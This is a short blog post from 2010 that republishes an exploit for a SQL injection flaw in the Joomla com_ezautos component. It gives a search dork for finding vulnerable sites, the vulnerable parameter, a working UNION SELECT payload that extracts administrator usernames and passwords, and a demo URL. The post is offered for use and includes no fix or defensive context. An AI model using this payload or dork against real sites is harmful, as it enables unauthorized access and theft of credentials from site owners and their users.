Joomla Component (com_ezautos) SQL Injection Vulnerability ~ Zer0-0ne

Thursday, September 23, 2010

Joomla Component (com_ezautos) SQL Injection Vulnerability

Author : Gamoscu
Blog :http://gamoscu.wordpress.com/
Script : Joomla http://www.joostina-cms.org/content/view/20/35/
Dork : inurl:com_ezautos
###########################

[ Vulnerable File ]

index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]

[ XpL ]

+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--

[ Demo]

http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--

Zer0-0ne

Thursday, September 23, 2010

Joomla Component (com_ezautos) SQL Injection Vulnerability

0 comments:

Post a Comment

About Me

Blog Archive

Popular Posts

Categories

Featured Posts